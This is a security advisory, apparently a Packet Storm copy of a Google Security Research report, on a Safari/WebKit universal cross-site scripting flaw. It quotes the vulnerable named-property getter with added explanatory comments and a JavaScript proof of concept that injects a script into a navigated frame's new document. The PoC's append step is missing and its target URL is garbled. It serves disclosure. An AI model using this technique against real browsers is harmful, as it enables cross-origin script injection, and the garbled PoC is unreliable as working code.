Apple WebKit Named Property UXSS

Type packetstorm
Reporter Google Security Research
Modified 2017-04-09T00:00:00


Apple WebKit: UXSS by accessing a named property from an unloaded window
When a window is unloaded (for example because its frame is navigated), the frame is not detached from that window, so code that still holds a reference to the old window can reach the new document's named properties through the following function:
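// Quoted from WebKit (JSDOMWindowProperties) as it stood when this bug was reported.
// The advisory's flattened listing had lost its braces; they are restored here and
// the logic is otherwise left exactly as quoted — this is the vulnerable code, not a fix.
//
// Resolves `propertyName` against the named items (elements reachable by name/id,
// e.g. `logo` in the PoC below) of the HTMLDocument currently loaded in `frame`.
// On a hit the element (or, if several elements share the name, a live
// HTMLCollection of them) is published through `slot` as a
// ReadOnly|DontDelete|DontEnum value and `true` is returned; otherwise `false`.
//
// Security note — this is the flaw the advisory describes: the lookup targets
// `frame.document()`, i.e. whatever document the frame holds *at call time*, not
// the document the `thisObject` window wrapper was created for. Because the frame
// is not detached when its window is unloaded, a function created in the old
// window can still reach this getter after the frame has navigated and receive a
// wrapper for an element of the newly loaded document, which the PoC appears to
// use to plant a script element there. A fix presumably has to tie the lookup to
// the document/window the wrapper belongs to rather than the frame's current one.
static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)
{
    Document* document = frame.document(); // <<-------- the new document (reporter's annotation).
    if (is<HTMLDocument>(*document)) {
        auto& htmlDocument = downcast<HTMLDocument>(*document);
        auto* atomicPropertyName = propertyName.publicName();
        if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {
            JSValue namedItem;
            if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {
                // Several elements share the name: hand back a live collection of them.
                Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);
                ASSERT(collection->length() > 1);
                namedItem = toJS(exec, thisObject->globalObject(), collection);
            } else
                namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));
            // Note the wrapper is created in thisObject's global object while the
            // element belongs to the frame's current document.
            slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);
            return true;
        }
    }
    return false;
}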
// Proof of concept as quoted in the advisory. This copy is incomplete: the statement
// that attaches `sc` to `node` and the closing `};` of the onload handler are
// missing, and the URL assigned on the last line was lost to markup garbling.
"use strict";
// Child frame; starts out with its initial document and is navigated below via f.src.
let f = document.body.appendChild(document.createElement("iframe"));
// Function created in the child's *current* window. `logo` is resolved through the
// named-property getter shown above, against whatever document the frame holds
// when the function is called — not the document this window was created for.
let get_element = f.contentWindow.Function("return logo;");
f.onload = () => {
// One-shot handler: clear it so the navigation below does not re-enter.
f.onload = null;
// Runs after the frame has navigated: the old window is unloaded but its frame is
// not detached, so this hands back an element of the newly loaded document.
let node = get_element();
var sc = document.createElement("script");
sc.innerText = "alert(location)";
// (missing from this copy: presumably `sc` is appended to `node`, so the script runs
// in the navigated document and shows its location; then the handler closes with `};`)
// Navigate the frame; the intended target URL was garbled into an <a> tag here.
f.src = "<a href="";" title="" class="" rel="nofollow">";</a>
Tested on Safari 10.0.2 (build 12602.…; the rest of the build number is truncated in this copy).
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
Found by: lokihardt